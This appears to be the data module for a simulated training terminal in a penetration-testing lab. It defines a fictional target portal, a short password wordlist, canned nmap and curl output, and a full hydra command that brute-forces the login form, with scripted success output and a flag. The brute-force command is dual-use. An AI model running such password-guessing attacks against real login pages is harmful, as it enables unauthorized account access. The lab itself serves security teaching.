export const TARGET = {
  host: '10.8.0.22',
  hostname: 'portal.nexora.lab',
  url: 'http://10.8.0.22/login',
  user: 'bisha',
  pass: 'bisha',
}

export const COMMANDS = {
  help: [
    'Available tools in this lab:',
    '  help                 show this help',
    '  whoami               current identity',
    '  pwd                  working directory',
    '  ls                   list files',
    '  cat wordlist.txt     show password list',
    '  nmap 10.8.0.22       scan the training target',
    '  curl http://10.8.0.22/login',
    '  hydra -l bisha -P wordlist.txt 10.8.0.22 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"',
    '  cat flag.txt         read the session flag after Hydra',
    '  clear                clear the terminal',
  ],
  whoami: ['bisha'],
  pwd: ['/home/kali'],
  ls: [
    'Desktop  Documents  Downloads  wordlist.txt  flag.txt',
  ],
  wordlist: [
    'admin123',
    'password',
    'letmein',
    'qwerty',
    'bisha',
    'nexora',
    'welcome1',
  ],
  nmap: [
    'Starting Nmap 7.94SVN ( https://nmap.org ) at lab-time',
    'Nmap scan report for portal.nexora.lab (10.8.0.22)',
    'Host is up (0.003s latency).',
    'Not shown: 998 closed tcp ports',
    'PORT   STATE SERVICE VERSION',
    '22/tcp closed ssh',
    '80/tcp open  http    nginx 1.24.0',
    '| http-title: Nexora Employee Portal',
    '|_Requested resource was /login',
    'Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds',
  ],
  curl: [
    'HTTP/1.1 200 OK',
    'Server: nginx/1.24.0',
    'Content-Type: text/html',
    '',
    '<title>Nexora Employee Portal</title>',
    '<form method="POST" action="/login">',
    '  <input name="username">',
    '  <input name="password" type="password">',
    '</form>',
    '<!-- error fragment: Invalid credentials -->',
  ],
  hydra: [
    'Hydra v9.5 starting at lab-time',
    '[DATA] attacking http-post-form://10.8.0.22:80/login:username=^USER^&password=^PASS^:Invalid',
    '[80][http-post-form] host: 10.8.0.22   login: bisha   password: bisha',
    '1 of 1 target successfully completed, 1 valid password found',
    '[STATS] hydra finished',
  ],
}
